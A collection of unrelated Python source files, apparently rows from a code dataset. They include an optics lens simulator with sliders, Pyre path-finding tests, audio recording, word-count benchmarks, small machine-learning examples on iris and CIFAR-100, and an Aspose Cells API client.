str = fo.read(10)
print str
postion = fo.tell()
print "Curr file postion", postion
fo.seek(1, 1)
str = fo.read(10)
print str
#记得关闭
fo.close()
|
10,574 | 7089fe1a58a4437f215b6ae977b081dff4e2a930 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 17:32:23 2020
@author: carlotal
"""
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button
import proper
def objet_def(D,D_ratio,N):
x = np.linspace(-D/2,D/2,N,endpoint=False) + D/(2.0*N)
X,Y = np.meshgrid(x,x,sparse = False)
R = np.sqrt(X**2 + Y**2)
x0 = 0.3*D*D_ratio
y0 = 0.1*D*D_ratio
objet = (R<(D*D_ratio/2))*(1-(np.sqrt((X-x0)**2+(Y-y0)**2)<D*D_ratio/2/50))
return objet
plt.close('all')
#erreur_position = 2*1e-3 #erreur de positionnement des optiques, en mètres (FWHM d'une gausienne centrée sur la valeur vraie)
lbd = 0.55*1e-6 #longueur d'onde (m)
#focal length of lenses
foc_library = np.array([-100,50,100,200,250,500])
foc_library_rand = np.zeros(len(foc_library))
for k in range(len(foc_library)):
foc_library_rand[k] = np.random.normal(foc_library[k], np.abs(foc_library[k]*20/100/2.355)) #students will need to measure the focal length!
#lens_rand_index = np.random.permutation(len(foc_library))
#foc_library_rand = foc_library[lens_rand_index] #randomization of the lens library:
fig,ax = plt.subplots(1,3,figsize=[16,8])
plt.subplots_adjust(bottom=0.32)
# Parameters (distances in mm)
N_simu = 500
object_size_0 = 2
D_ratio = 0.8
window_size = object_size_0/D_ratio
#object_size_0 += np.random.normal(0,1e-3/2.355)
number_L1_0 = 3
number_L2_0 = 3
number_L3_0 = 3
distance_object_L1_0 = 220
distance_object_L3_0 = 200
distance_L3_L3_0 = 100
distance_L1_L2_0 = 300
distance_L2_screen_0 = 200
#delta focus (in mm)
delta_focus = 1
#initialization of function
objet = objet_def(window_size,D_ratio,N_simu)
onde_1 = proper.prop_begin(window_size*1e-3, lbd, N_simu, D_ratio)
proper.prop_multiply(onde_1, objet)
proper.prop_define_entrance(onde_1)
A_object_1 = np.abs(proper.prop_get_amplitude(onde_1))**2
A_object_1 /= np.max(A_object_1)
L_object_1 = D_ratio*N_simu*proper.prop_get_sampling(onde_1)*1e3
proper.prop_propagate(onde_1, distance_object_L1_0*1e-3)
proper.prop_lens(onde_1,foc_library_rand[number_L1_0]*1e-3)
proper.prop_propagate(onde_1, distance_L1_L2_0*1e-3)
proper.prop_lens(onde_1, foc_library_rand[number_L2_0]*1e-3)
proper.prop_propagate(onde_1, distance_L2_screen_0*1e-3)
A_screen = np.abs(proper.prop_get_amplitude(onde_1))**2
L_screen = D_ratio*N_simu*proper.prop_get_sampling(onde_1)*1e3
A_screen *= np.sum(A_object_1)/np.sum(A_screen)#*(L_object/L_screen)**2
onde_3 = proper.prop_begin(window_size*1e-3, lbd, N_simu, D_ratio)
proper.prop_multiply(onde_3, objet)
proper.prop_define_entrance(onde_3)
A_object_3 = np.abs(proper.prop_get_amplitude(onde_3))**2
A_object_3 /= np.max(A_object_3)
L_object_3 = D_ratio*N_simu*proper.prop_get_sampling(onde_3)*1e3
proper.prop_propagate(onde_3, distance_object_L3_0*1e-3)
proper.prop_lens(onde_3,foc_library_rand[number_L3_0]*1e-3)
proper.prop_propagate(onde_3, distance_L3_L3_0*1e-3)
proper.prop_lens(onde_3, foc_library_rand[number_L3_0]*1e-3)
proper.prop_propagate(onde_3, distance_object_L3_0*1e-3)
A_collim = np.abs(proper.prop_get_amplitude(onde_3))**2
L_collim = D_ratio*N_simu*proper.prop_get_sampling(onde_3)*1e3
A_collim *= np.sum(A_object_3)/np.sum(A_collim)
#plot
l_1 = ax[0].imshow(A_object_3,extent=(-L_object_3/2,L_object_3/2,-L_object_3/2,L_object_3/2),cmap='gray',vmin=0,vmax=1.2)
ax[0].set_title('Objet physique')
l_2 = ax[1].imshow(A_screen,extent=(-L_screen/2,L_screen/2,-L_screen/2,L_screen/2),cmap='gray',vmin=0,vmax=1.2)
ax[1].set_title('Lumière sur l\'écran après L2')
l_3 = ax[2].imshow(A_collim+A_object_3,extent=(-L_collim/2,L_collim/2,-L_collim/2,L_collim/2),cmap='gray',vmin=0,vmax=2.4)
ax[2].set_title('Image autocollimation L3')
ax[2].set_axis_off()
#ax.margins(x=0)
axcolor = 'white'
ax_object_size = plt.axes([0.25, 0.1, 0.65, 0.02], facecolor=axcolor)
ax_L1_focal_length = plt.axes([0.25, 0.13, 0.65, 0.02], facecolor=axcolor)
ax_L2_focal_length = plt.axes([0.25, 0.16, 0.65, 0.02], facecolor=axcolor)
ax_L3_focal_length = plt.axes([0.25, 0.19, 0.65, 0.02], facecolor=axcolor)
ax_distance_object_L1 = plt.axes([0.25, 0.22, 0.65, 0.02], facecolor=axcolor)
ax_distance_object_L3 = plt.axes([0.25, 0.25, 0.65, 0.02], facecolor=axcolor)
ax_distance_L1_L2 = plt.axes([0.25, 0.28, 0.65, 0.02], facecolor=axcolor)
ax_distance_L2_screen = plt.axes([0.25, 0.31, 0.65, 0.02], facecolor=axcolor)
#Sliders
s_object_size = Slider(ax_object_size,'Taille objet',1,10,valinit=object_size_0,valstep = 0.5)
s_number_L1 = Slider(ax_L1_focal_length,'Numéro lentille L1',1,len(foc_library),valinit=number_L1_0,valstep=delta_focus)
s_number_L2 = Slider(ax_L2_focal_length,'Numéro lentille L2',1,len(foc_library),valinit=number_L2_0,valstep=delta_focus)
s_number_L3 = Slider(ax_L3_focal_length,'Numéro lentille L3 (autocollimation)',1,len(foc_library),valinit=number_L3_0,valstep=delta_focus)
s_distance_object_L1 = Slider(ax_distance_object_L1,'Distance Objet L1',0,600,valinit=distance_object_L1_0,valstep = 1)
s_distance_object_L3 = Slider(ax_distance_object_L3,'Distance Objet L3 (autocollimation)',0,600,valinit=distance_object_L3_0,valstep = 1)
s_distance_L1_L2 = Slider(ax_distance_L1_L2,'Distance L1 L2',0,1000,valinit=distance_L1_L2_0,valstep = 1)
s_distance_L2_screen = Slider(ax_distance_L2_screen,'Distance L2 écran',0,600,valinit=distance_L2_screen_0,valstep = 1)
def update(val):
n_object_size = s_object_size.val*1e-3
n_window_size = n_object_size/D_ratio
n_number_L1 = int(s_number_L1.val-1)
n_number_L2 = int(s_number_L2.val-1)
n_number_L3 = int(s_number_L3.val-1)
n_distance_object_L1 = s_distance_object_L1.val*1e-3
n_distance_object_L3 = s_distance_object_L3.val*1e-3
n_distance_L1_L2 = s_distance_L1_L2.val*1e-3
n_distance_L3_L3 = distance_L3_L3_0*1e-3
n_distance_L2_screen = s_distance_L2_screen.val*1e-3
n_objet = objet_def(n_window_size,D_ratio,N_simu)
onde_1 = proper.prop_begin(n_window_size, lbd, N_simu, D_ratio)
proper.prop_multiply(onde_1, n_objet)
proper.prop_define_entrance(onde_1)
A_object_1 = np.abs(proper.prop_get_amplitude(onde_1))**2
A_object_1 /= np.max(A_object_1)
#L_object_1 = D_ratio*N_simu*proper.prop_get_sampling(onde_1)*1e3
proper.prop_propagate(onde_1, n_distance_object_L1)
proper.prop_lens(onde_1,foc_library_rand[n_number_L1]*1e-3)
proper.prop_propagate(onde_1, n_distance_L1_L2)
proper.prop_lens(onde_1, foc_library_rand[n_number_L2]*1e-3)
proper.prop_propagate(onde_1, n_distance_L2_screen)
A_screen = np.abs(proper.prop_get_amplitude(onde_1))**2
L_screen = D_ratio*N_simu*proper.prop_get_sampling(onde_1)*1e3
A_screen *= np.sum(A_object_1)/np.sum(A_screen)#*(L_object/L_screen)**2
onde_3 = proper.prop_begin(n_window_size, lbd, N_simu, D_ratio)
proper.prop_multiply(onde_3, n_objet)
proper.prop_define_entrance(onde_3)
A_object_3 = np.abs(proper.prop_get_amplitude(onde_3))**2
A_object_3 /= np.max(A_object_3)
L_object_3 = D_ratio*N_simu*proper.prop_get_sampling(onde_3)*1e3
proper.prop_propagate(onde_3, n_distance_object_L3)
proper.prop_lens(onde_3,foc_library_rand[n_number_L3]*1e-3)
proper.prop_propagate(onde_3, n_distance_L3_L3)
proper.prop_lens(onde_3, foc_library_rand[n_number_L3]*1e-3)
proper.prop_propagate(onde_3, n_distance_object_L3)
A_collim = np.abs(proper.prop_get_amplitude(onde_3))**2
L_collim = D_ratio*N_simu*proper.prop_get_sampling(onde_3)*1e3
A_collim *= np.sum(A_object_3)/np.sum(A_collim)
l_1.set_data(A_object_3)
l_1.set_extent((-L_object_3/2,L_object_3/2,-L_object_3/2,L_object_3/2))
l_2.set_data(A_screen)
l_2.set_extent((-L_screen/2,L_screen/2,-L_screen/2,L_screen/2))
l_3.set_data(A_collim+A_object_3)
l_3.set_extent((-L_collim/2,L_collim/2,-L_collim/2,L_collim/2))
fig.canvas.draw_idle()
s_object_size.on_changed(update)
s_number_L1.on_changed(update)
s_number_L2.on_changed(update)
s_number_L3.on_changed(update)
s_distance_object_L1.on_changed(update)
s_distance_object_L3.on_changed(update)
s_distance_L1_L2.on_changed(update)
s_distance_L2_screen.on_changed(update)
resetax = plt.axes([0.8, 0.025, 0.1, 0.04])
button = Button(resetax, 'Reset', color=axcolor, hovercolor='0.975')
def reset(event):
s_object_size.reset()
s_number_L1.reset()
s_number_L2.reset()
s_number_L3.reset()
s_distance_object_L1.reset()
s_distance_object_L3.reset()
s_distance_L1_L2.reset()
s_distance_L2_screen.reset()
button.on_clicked(reset)
# plt.show()
|
10,575 | 995a5a8e71a90ab0a3dfab73972b4dede8fe5fc1 | # Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import unittest
from unittest.mock import patch
from .. import find_directories
from ..find_directories import find_local_root, find_project_root, find_root
class InitTest(unittest.TestCase):
@patch("os.path.isfile")
def test_find_configuration(self, os_mock_isfile) -> None:
os_mock_isfile.side_effect = [False, False, False, True]
self.assertEqual(find_root("/a/b/c/d", "configuration"), "/a")
os_mock_isfile.side_effect = [True]
self.assertEqual(find_root("/a", "configuration"), "/a")
os_mock_isfile.side_effect = [False, False, False]
self.assertEqual(find_root("/a/b", "configuration"), None)
def test_find_project_root(self) -> None:
original_directory = "/a/b/c"
with patch("os.path.realpath", return_value="realpath"), patch(
"os.path.isfile", return_value=False
) as isfile, patch("os.getcwd", return_value="/a/b/c"):
isfile.side_effect = (
lambda directory: directory == "/a/b/.pyre_configuration"
)
directory = find_project_root(original_directory)
self.assertEqual(directory, "/a/b")
with patch.object(find_directories, "find_root") as mock_find_root:
original_directory = "/a/b"
mock_find_root.side_effect = ["/a", "/a/b"]
directory = find_project_root(original_directory)
self.assertEqual(directory, "/a")
def test_find_local_root(self) -> None:
original_directory = "/a/b/c"
with patch("os.path.realpath", return_value="realpath"), patch(
"os.path.isfile", return_value=False
) as isfile:
local_root = find_local_root(original_directory)
self.assertEqual(local_root, None)
isfile.side_effect = (
lambda directory: directory == "/a/b/.pyre_configuration.local"
)
local_root = find_local_root(original_directory)
self.assertEqual(local_root, "/a/b")
|
10,576 | 4f80c9fb7da79c95f325cde7017766dc74288b59 | #Resposta do exercicio 1.Faça um programa que receba a idade do usuário e diga se ele é maior ou menor de idade.
def ageCheck(ageUser = int(input("how old are you?"))):
if (ageUser >= 18):
return True
else:
return False
print(ageCheck())
|
10,577 | c4645c56d30caa3253c654d215b5e28256159a15 | import config as c
import numpy as np
from pathlib import Path
import matplotlib.pyplot as plt
import data.data_helpers as data_helpers
import data.prepare_data as prepare_data
import evaluate
from evaluate import compute_calibration,sample_posterior
import time
import torch
#compute_calibration = evaluate.compute_calibration
#sample_posterior = evaluate.sample_posterior
x_all, y_all, ana_all = data_helpers.concatenate_test_set(c.evaluation_samples)
def show_error_correlations(x=x_all,y=y_all,load=False):
#plot error co2 against: xco2, "albedo_o2","albedo_sco2","albedo_wco2", "tcwv" 4
#and: "year","xco2_apriori","altitude","psurf","t700","longitude","latitude" 7
#"snr_wco2","snr_sco2","snr_o2a","aod_bc","aod_dust","aod_ice","aod_oc","aod_seasalt","aod_sulfate","aod_total","aod_water"
params=prepare_data.x_to_params(x)
spectra=prepare_data.y_to_spectra(y)
post = sample_posterior(y)
diff = torch.mean(torch.FloatTensor(post), dim = 1)-x
#post_params =prepare_data.x_to_params(post)
_,_,uncert_intervals,_, post_params = compute_calibration(x,y,load=load)
uncert_error_co2=uncert_intervals[68,:,c.co2_pos]/2
diff = np.mean(post_params, axis = 1) - params
diff_co2 = diff [:, 0]
error_name = ['error_correlations', 'estimated_error_correlations']
for l,spectra in enumerate([spectra,np.array(y)]):
if l==1:
params = np.array(x)
for k, diff in enumerate([diff_co2, uncert_error_co2]):
plt.figure(error_name[k]+f'_{l}',figsize=(20,15))
plt.title(error_name[k]+f'_{l}')
print(diff.shape)
horizontal_figures = 4
vertical_figures = 6
diff = np.clip(diff,-4,4)
for i in range(horizontal_figures):
ax = plt.subplot(horizontal_figures, vertical_figures, vertical_figures*i+1)
bins=np.linspace(np.min(diff),np.max(diff),100)
plt.hist(diff, bins=bins, histtype='step',color="lightskyblue", orientation="horizontal")
if i>0:
#ax.axis('off')
ax.set_xticks([])
plt.ylabel(f"error of prediction in ppm")
for i in range(horizontal_figures):
for j in range(vertical_figures-1):
ax = plt.subplot(horizontal_figures, vertical_figures, vertical_figures*i+j+2)
if i == 0:
ax.xaxis.tick_top()
#plt.xlabel(c.param_names[i])
ax.set_xlabel(prepare_data.params_names[j])
ax.xaxis.set_label_position('top')
#plt.scatter(params[:, j],diff[:, 0],s=0.5,alpha=0.2,color="green")
plt.scatter(params[:, j],diff,s=1,alpha=0.3,color="blue")
#plt.ylabel(f"{prepare_data.params_names[j]}")
if i == 1:
plt.scatter(spectra[:, -j-1],diff,s=1,alpha=0.3,color="blue")
#plt.ylabel(f"{prepare_data.spectra_names[-j]}")
ax.set_xlabel(prepare_data.spectra_names[-j-1])
ax.xaxis.set_label_position('top')
if i == 2:
plt.scatter(spectra[:, -j-5-1],diff,s=1,alpha=0.3,color="blue")
ax.set_xlabel(f"{prepare_data.spectra_names[-j-5-1]}")
if i == 3:
plt.scatter(spectra[:, -j-10-1],diff,s=1,alpha=0.3,color="blue")
ax.set_xlabel(f"{prepare_data.spectra_names[-j-10-1]}")
if __name__ == "__main__":
show_error_correlations(load=False)
plt.show() |
10,578 | ffbb6fab14fdbf40b5c23b1c5fc6e55b8fcaadbd | '''
Link: https://www.codechef.com/DEM2020/problems/TOWIN
'''
from sys import stdin,stdout
for _ in range(int(stdin.readline())):
n=int(stdin.readline())
nums=list(map(int,stdin.readline().split()))
if n==1:
stdout.write(str('first\n'))
elif n==2:
if nums[0]==nums[1]:
stdout.write(str('draw\n'))
else:
stdout.write('first\n')
else:
nums.sort(reverse=True)
first=nums[0]
sec=nums[1]+nums[2]
if n==3:
if sec>first:
stdout.write('second\n')
elif sec<first:
stdout.write('first\n')
else:
stdout.write('draw\n')
else:
for i in range(3,n,2):
first+=nums[i]
for i in range(4,n,2):
sec+=nums[i]
if sec>first:
stdout.write('second\n')
elif sec<first:
stdout.write('first\n')
else:
stdout.write('draw\n')
|
10,579 | 5b62d818c133391728b22cbbc8b5889c6e0b3e72 |
from aspose.cloud.common.product import Product
from aspose.cloud.common.utils import Utils
from aspose.cloud.common.asposeapp import AsposeApp
class CellsExtractor(object):
file_name = ""
def __init__(self, file_name):
self.file_name = file_name
def get_picture(self, worksheet_name, picture_index, image_format):
try:
if self.file_name == "":
raise Exception("Please Specify File Name")
str_uri = Product.base_product_uri + "/cells/" + self.file_name + "/worksheets/" + worksheet_name + "/pictures/" + str(picture_index) + "?format=" + image_format
signed_uri = Utils.sign(Utils(), str_uri)
response_stream = Utils.process_command(Utils(), signed_uri, "GET", "", "")
v_output = Utils.validate_output(Utils(), response_stream)
if v_output == "":
output_path = AsposeApp.output_location + Utils.get_filename(Utils(), self.file_name) + "_" + worksheet_name + "." + image_format
Utils.save_file(Utils(), response_stream, output_path)
return output_path
else:
return v_output
except:
raise
def get_oleobject(self, worksheet_name, oleobject_index, image_format):
try:
if self.file_name == "":
raise Exception("Please Specify File Name")
str_uri = Product.base_product_uri + "/cells/" + self.file_name + "/worksheets/" + worksheet_name + "/oleobjects/" + str(oleobject_index) + "?format=" + image_format
signed_uri = Utils.sign(Utils(), str_uri)
response_stream = Utils.process_command(Utils(), signed_uri, "GET", "", "")
v_output = Utils.validate_output(Utils(), response_stream)
if v_output == "":
output_path = AsposeApp.output_location + Utils.get_filename(Utils(), self.file_name) + "_" + worksheet_name + "." + image_format
Utils.save_file(Utils(), response_stream, output_path)
return output_path
else:
return v_output
except:
raise
def get_chart(self, worksheet_name, chart_index, image_format):
try:
if self.file_name == "":
raise Exception("Please Specify File Name")
str_uri = Product.base_product_uri + "/cells/" + self.file_name + "/worksheets/" + worksheet_name + "/charts/" + str(chart_index) + "?format=" + image_format
signed_uri = Utils.sign(Utils(), str_uri)
response_stream = Utils.process_command(Utils(), signed_uri, "GET", "", "")
v_output = Utils.validate_output(Utils(), response_stream)
if v_output == "":
output_path = AsposeApp.output_location + Utils.get_filename(Utils(), self.file_name) + "_" + worksheet_name + "." + image_format
Utils.save_file(Utils(), response_stream, output_path)
return output_path
else:
return v_output
except:
raise
def get_autoshape(self, worksheet_name, autoshape_index, image_format):
try:
if self.file_name == "":
raise Exception("Please Specify File Name")
str_uri = Product.base_product_uri + "/cells/" + self.file_name + "/worksheets/" + worksheet_name + "/autoshapes/" + str(autoshape_index) + "?format=" + image_format
signed_uri = Utils.sign(Utils(), str_uri)
response_stream = Utils.process_command(Utils(), signed_uri, "GET", "", "")
v_output = Utils.validate_output(Utils(), response_stream)
if v_output == "":
output_path = AsposeApp.output_location + Utils.get_filename(Utils(), self.file_name) + "_" + worksheet_name + "." + image_format
Utils.save_file(Utils(), response_stream, output_path)
return output_path
else:
return v_output
except:
raise |
10,580 | 7ab65cbcd089fafaa532981c1ae34a820d1a2d71 | import os
import pyaudio
import wave
import time as t
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 48000
CHUNK = 1024
RECORD_SECONDS = 3
WAVE_OUTPUT_FILENAME = "file2.wav"
audio = pyaudio.PyAudio()
print(f"Bith depth: 16")
print(f"Sample rate: {RATE}")
print(f"Chunk size: {CHUNK}")
print(f"Recording time: {RECORD_SECONDS} seconds")
print(f"Output file name: {WAVE_OUTPUT_FILENAME}")
print()
stream = audio.open(format=FORMAT, channels=CHANNELS,
rate=RATE, input=True,
frames_per_buffer=CHUNK)
print("recording...")
frames = []
start_sensing = t.time()
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
end_sensing = t.time()
sensing_time = start_sensing-end_sensing
print("finished recording")
# stop Recording
stream.stop_stream()
stream.close()
# Destroy auio object to destroy memory
audio.terminate()
t_start_storing = t.time()
waveFile = wave.open(WAVE_OUTPUT_FILENAME, 'wb')
waveFile.setnchannels(CHANNELS)
waveFile.setsampwidth(audio.get_sample_size(FORMAT))
waveFile.setframerate(RATE)
waveFile.writeframes(b''.join(frames))
waveFile.close()
t_end_storing = t.time()
print(f"time for sensing the audio: {sensing_time}")
print(f"Time for storing the data on disk: {round(t_end_storing-t_start_storing, 4)} seconds")
wav_size = os.path.getsize("./file2.wav")
print(f"The size of the wav file is: {int(wav_size/1024)} KiloBytes")
|
10,581 | bdca99266a45df63c56d1a1d9d49fe0441a417f7 | import os
from concurrent.futures import ThreadPoolExecutor
import pytest
import word_count
current_dir = os.path.abspath(os.path.dirname(__file__))
path = os.path.join(current_dir, "zen-of-python.txt")
@pytest.fixture(scope="session")
def contents() -> str:
text = """
The Zen of Python, by Tim Peters
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!
"""
return text * 1000
def test_word_count_rust_parallel(benchmark, contents):
count = benchmark(word_count.search, contents, "is")
assert count == 10000
def test_word_count_rust_sequential(benchmark, contents):
count = benchmark(word_count.search_sequential, contents, "is")
assert count == 10000
def test_word_count_python_sequential(benchmark, contents):
count = benchmark(word_count.search_py, contents, "is")
assert count == 10000
def run_rust_sequential_twice(
executor: ThreadPoolExecutor, contents: str, needle: str
) -> int:
future_1 = executor.submit(
word_count.search_sequential_allow_threads, contents, needle
)
future_2 = executor.submit(
word_count.search_sequential_allow_threads, contents, needle
)
result_1 = future_1.result()
result_2 = future_2.result()
return result_1 + result_2
def test_word_count_rust_sequential_twice_with_threads(benchmark, contents):
executor = ThreadPoolExecutor(max_workers=2)
count = benchmark(run_rust_sequential_twice, executor, contents, "is")
assert count == 20000
|
10,582 | 2ed3ae4a0164c559ca4f30d814ccb33a91e80fa4 | print('%5i%5i' % (10, 235))
print('%5i%5i' % (1000, 50)) |
10,583 | d2b408f24bd2f587df74aef003b1f97337bfdc4a | from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import GaussianNB
iris = load_iris()
print(iris)
X = iris.data
y = iris.target
print(X.shape)
print(y.shape)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=84)
model = GaussianNB()
model.fit(X_train, y_train)
print(model.score(X_train, y_train))
print(model.score(X_test, y_test))
print(model.predict(X_test[0:1]))
print(model.predict(y_test[0])) |
10,584 | 9c907d6c7f1022eceec96537deaebbac21036227 | import numpy as np
from keras.datasets import cifar100
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils, generic_utils
'''
Train a (fairly simple) deep CNN on the CIFAR10 small images dataset.
GPU run command:
THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python cifar10_cnn.py
It gets down to 0.65 test logloss in 25 epochs, and down to 0.55 after 50 epochs.
(it's still underfitting at that point, though).
'''
batch_size = 128
nb_classes = 10
nb_epoch = 1
data_augmentation = True
all_time_best = []
import time
from random import random
def train_data(ds_idx):
time.sleep(5000 * random())
# the data, shuffled and split between tran and test sets
(X_train, y_train), (X_test, y_test) = cifar100.load_data(test_split=0.15)
train_idx = np.where((y_train >= ds_idx * 10) & (y_train < (1 + ds_idx) * 10))[0]
test_idx = np.where((y_test >= ds_idx * 10) & (y_test < (1 + ds_idx) * 10))[0]
X_train = np.array([X_train[i] for i in train_idx])
y_train = np.array([y_train[i] for i in train_idx])
X_test = np.array([X_test[i] for i in test_idx])
y_test = np.array([y_test[i] for i in test_idx])
print X_train.shape[0], 'train samples'
print X_test.shape[0], 'test samples'
y_train -= ds_idx * 10
y_test -= ds_idx * 10
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
model = Sequential()
model.add(Convolution2D(32, 3, 3, 3, border_mode='full'))
model.add(Activation('relu'))
model.add(Dropout(0.8))
model.add(Convolution2D(32, 32, 3, 3))
model.add(Activation('relu'))
model.add(MaxPooling2D(poolsize=(2, 2)))
model.add(Dropout(0.75))
model.add(Convolution2D(64, 32, 3, 3, border_mode='full'))
model.add(Activation('relu'))
model.add(Dropout(0.7))
model.add(Convolution2D(64, 64, 3, 3))
model.add(Activation('relu'))
model.add(MaxPooling2D(poolsize=(2, 2)))
model.add(Dropout(0.6))
model.add(Flatten(64*8*8))
model.add(Dense(64*8*8, 512, init='normal'))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(512, nb_classes, init='normal'))
model.add(Activation('softmax'))
# let's train the model using SGD + momentum (how original).
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer=sgd)
if not data_augmentation:
print "Not using data augmentation or normalization"
X_train = X_train.astype("float32")
X_test = X_test.astype("float32")
X_train /= 255
X_test /= 255
model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=10)
score = model.evaluate(X_test, Y_test, batch_size=batch_size)
print 'Test score:', score
else:
print "Using real time data augmentation"
# this will do preprocessing and realtime data augmentation
datagen = ImageDataGenerator(
featurewise_center=True, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=True, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
rotation_range=20, # randomly rotate images in the range (degrees, 0 to 180)
width_shift_range=0.3, # randomly shift images horizontally (fraction of total width)
height_shift_range=0.3, # randomly shift images vertically (fraction of total height)
horizontal_flip=True, # randomly flip images
vertical_flip=False) # randomly flip images
# compute quantities required for featurewise normalization
# (std, mean, and principal components if ZCA whitening is applied)
datagen.fit(X_train)
best_score = 0.0
best_epoch = 0
for e in range(nb_epoch):
print '-'*40
print 'Epoch', e
print '-'*40
print "Training..."
# batch train with realtime data augmentation
progbar = generic_utils.Progbar(X_train.shape[0])
for X_batch, Y_batch in datagen.flow(X_train, Y_train):
loss = model.train(X_batch, Y_batch)
progbar.add(X_batch.shape[0], values=[("train loss", loss)])
print "Testing..."
# test time!
progbar = generic_utils.Progbar(X_test.shape[0])
pred = model.predict_classes(X_test, batch_size=batch_size)
score = np_utils.accuracy(pred, Y_test)
best_epoch, best_score = (best_epoch, best_score) if best_score >= score else (e, score)
print 'Score: ', score
print 'Best: ', best_score, ' at epoch: ', best_epoch
#for X_batch, Y_batch in datagen.flow(X_test, Y_test):
#score = model.test(X_batch, Y_batch)
#progbar.add(X_batch.shape[0], values=[("test loss", score)])
all_time_best.append((best_epoch, best_score))
from multiprocessing import Pool
pool = Pool(processes=7)
pool.map(train_data, xrange(10))
for epoch, score in all_time_best:
print 'At: ', epoch, ', best score: ', score
#for ds_idx in xrange(10):
#train_data(ds_idx)
# the data, shuffled and split between tran and test sets
#(X_train, y_train), (X_test, y_test) = cifar100.load_data(test_split=0.15)
#train_idx = np.where((y_train >= ds_idx * 10) & (y_train < (1 + ds_idx) * 10))[0]
#test_idx = np.where((y_test >= ds_idx * 10) & (y_test < (1 + ds_idx) * 10))[0]
#X_train = np.array([X_train[i] for i in train_idx])
#y_train = np.array([y_train[i] for i in train_idx])
#X_test = np.array([X_test[i] for i in test_idx])
#y_test = np.array([y_test[i] for i in test_idx])
#print X_train.shape[0], 'train samples'
#print X_test.shape[0], 'test samples'
#y_train -= ds_idx * 10
#y_test -= ds_idx * 10
## convert class vectors to binary class matrices
#Y_train = np_utils.to_categorical(y_train, nb_classes)
#Y_test = np_utils.to_categorical(y_test, nb_classes)
#model = Sequential()
#model.add(Convolution2D(32, 3, 3, 3, border_mode='full'))
#model.add(Activation('relu'))
#model.add(Dropout(0.8))
#model.add(Convolution2D(32, 32, 3, 3))
#model.add(Activation('relu'))
#model.add(MaxPooling2D(poolsize=(2, 2)))
#model.add(Dropout(0.75))
#model.add(Convolution2D(64, 32, 3, 3, border_mode='full'))
#model.add(Activation('relu'))
#model.add(Dropout(0.7))
#model.add(Convolution2D(64, 64, 3, 3))
#model.add(Activation('relu'))
#model.add(MaxPooling2D(poolsize=(2, 2)))
#model.add(Dropout(0.6))
#model.add(Flatten(64*8*8))
#model.add(Dense(64*8*8, 512, init='normal'))
#model.add(Activation('relu'))
#model.add(Dropout(0.5))
#model.add(Dense(512, nb_classes, init='normal'))
#model.add(Activation('softmax'))
## let's train the model using SGD + momentum (how original).
#sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
#model.compile(loss='categorical_crossentropy', optimizer=sgd)
#if not data_augmentation:
#print "Not using data augmentation or normalization"
#X_train = X_train.astype("float32")
#X_test = X_test.astype("float32")
#X_train /= 255
#X_test /= 255
#model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=10)
#score = model.evaluate(X_test, Y_test, batch_size=batch_size)
#print 'Test score:', score
#else:
#print "Using real time data augmentation"
## this will do preprocessing and realtime data augmentation
#datagen = ImageDataGenerator(
#featurewise_center=True, # set input mean to 0 over the dataset
#samplewise_center=False, # set each sample mean to 0
#featurewise_std_normalization=True, # divide inputs by std of the dataset
#samplewise_std_normalization=False, # divide each input by its std
#zca_whitening=False, # apply ZCA whitening
#rotation_range=20, # randomly rotate images in the range (degrees, 0 to 180)
#width_shift_range=0.3, # randomly shift images horizontally (fraction of total width)
#height_shift_range=0.3, # randomly shift images vertically (fraction of total height)
#horizontal_flip=True, # randomly flip images
#vertical_flip=False) # randomly flip images
## compute quantities required for featurewise normalization
## (std, mean, and principal components if ZCA whitening is applied)
#datagen.fit(X_train)
#best_score = 0.0
#best_epoch = 0
#for e in range(nb_epoch):
#print '-'*40
#print 'Epoch', e
#print '-'*40
#print "Training..."
## batch train with realtime data augmentation
#progbar = generic_utils.Progbar(X_train.shape[0])
#for X_batch, Y_batch in datagen.flow(X_train, Y_train):
#loss = model.train(X_batch, Y_batch)
#progbar.add(X_batch.shape[0], values=[("train loss", loss)])
#print "Testing..."
## test time!
#progbar = generic_utils.Progbar(X_test.shape[0])
#pred = model.predict_classes(X_test, batch_size=batch_size)
#score = np_utils.accuracy(pred, Y_test)
#best_epoch, best_score = (best_epoch, best_score) if best_score >= score else (e, score)
#print 'Score: ', score
#print 'Best: ', best_score, ' at epoch: ', best_epoch
##for X_batch, Y_batch in datagen.flow(X_test, Y_test):
##score = model.test(X_batch, Y_batch)
##progbar.add(X_batch.shape[0], values=[("test loss", score)])
#all_time_best.append((best_epoch, best_score))
